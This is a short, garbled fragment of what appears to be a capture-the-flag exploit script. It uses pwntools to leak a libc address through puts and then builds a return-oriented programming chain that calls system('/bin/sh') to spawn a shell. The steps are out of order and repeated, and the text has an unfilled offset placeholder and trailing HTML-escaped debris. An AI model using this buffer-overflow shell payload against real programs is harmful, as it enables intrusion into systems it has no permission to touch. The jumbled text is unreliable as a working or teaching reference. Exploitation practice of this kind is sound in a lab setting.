Work - Hunta-694

# ---- Step 3: Build final ROP chain -------------------------------- pop_rdi = (rop.find_gadget(['pop rdi', 'ret']))[0] bin_sh = next(libc.search(b'/bin/sh')) system = libc.symbols['system']

# ---- Step 1: Leak an address (example: puts@GLIBC) ----------------- offset = <offset_to_ret> puts_plt = ELF.plt['puts'] puts_got = ELF.got['puts'] main_addr = ELF.symbols['main'] hunta-694

rop_payload = flat( b'A' * offset, pop_rdi, bin_sh, system ) io.sendlineafter(b'> ', rop_payload) # ---- Step 3: Build final ROP chain

$ ./exploit.py | tee flag.txt or within the interactive session: system ) io.sendlineafter(b'&gt